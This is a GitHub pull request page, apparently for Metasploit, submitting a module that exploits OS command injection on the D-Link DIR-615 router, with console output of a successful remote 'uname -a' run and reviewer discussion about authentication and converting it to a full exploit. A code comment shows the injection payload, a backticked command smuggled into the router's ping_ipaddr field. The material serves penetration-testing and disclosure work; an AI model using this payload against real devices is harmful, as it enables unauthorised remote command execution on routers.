Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Dlink dir615 os command exec #1640

Closed
wants to merge 2 commits into from

Conversation

m-1-k-3
Copy link
Contributor

@m-1-k-3 m-1-k-3 commented Mar 23, 2013

Hey guys,

one more module - exploits the dlink dir 615 router:

Exploiting Demo - 192.168.178.105 / 0 auxiliary(dlink_dir_615_exec) > run

[] 192.168.178.199:80 - Trying to login with admin / admin1
[+] 192.168.178.199:80 - Successful login admin/admin1
[
] 192.168.178.199:80 - Sending remote command: uname -a
[+] 192.168.178.199:80 - Exploited successfully
[] 192.168.178.199:80 - Command: uname -a
[
] 192.168.178.199:80 - Output:
[*] Linux DIR-615 2.6.21 #2 Fri Jan 18 16:42:24 CST 2013 mips unknown

[*] Auxiliary module execution completed
Exploiting Demo - 192.168.178.105 / 0 auxiliary(dlink_dir_615_exec) > set VERBOSE false
VERBOSE => false
Exploiting Demo - 192.168.178.105 / 0 auxiliary(dlink_dir_615_exec) > run

[] 192.168.178.199:80 - Trying to login with admin / admin1
[+] 192.168.178.199:80 - Successful login admin/admin1
[
] 192.168.178.199:80 - Sending remote command: uname -a
[+] 192.168.178.199:80 - Exploited successfully
[*] Auxiliary module execution completed

More details: http://www.s3cur1ty.de/m1adv2013-008

looking forward for your feedback

Best,
Mike

#original request
#data_cmd = "page=tools_vct&hping=0&ping_ipaddr=`#{datastore['CMD']}; echo end`&ping6_ipaddr="

res = send_request_cgi(
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Looks like you're not sending credentials, neither cookies, neither tokens in the exploiting request, maybe it isn't authenticated after all? Just asking :)

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

the dlink is a crazy device ;) It authenticates my machine for 5mins. Enough time to execute our commands

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

lol crazy! ok, in that case I think if you send the pcap for verification I can do the last cleanup by myself in this case and proceed with merging :)

BTW, if any of the payloads on metasploit allow you to convert any of the auxiliary remote code exec modules you're sending into an exploit module, it would be great :) Feel free to ask my for feedback if necessary :)

Thanks for your submissions!

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I will check all the auxiliary modules in the next time ... possible that we could generate some working exploits.

@m-1-k-3
Copy link
Contributor Author

m-1-k-3 commented Mar 24, 2013

@jvazquez-r7 pcap is coming tomorrow. Thx for your helping hand

@jvazquez-r7
Copy link
Contributor

Hi @m-1-k-3,

After ask to more experienced developers, would be better to close it at the moment and work to convert it into an exploit. As explained by @hmoore-r7 the libupnp exploit can be a good reference https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb

See #1637

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

2 participants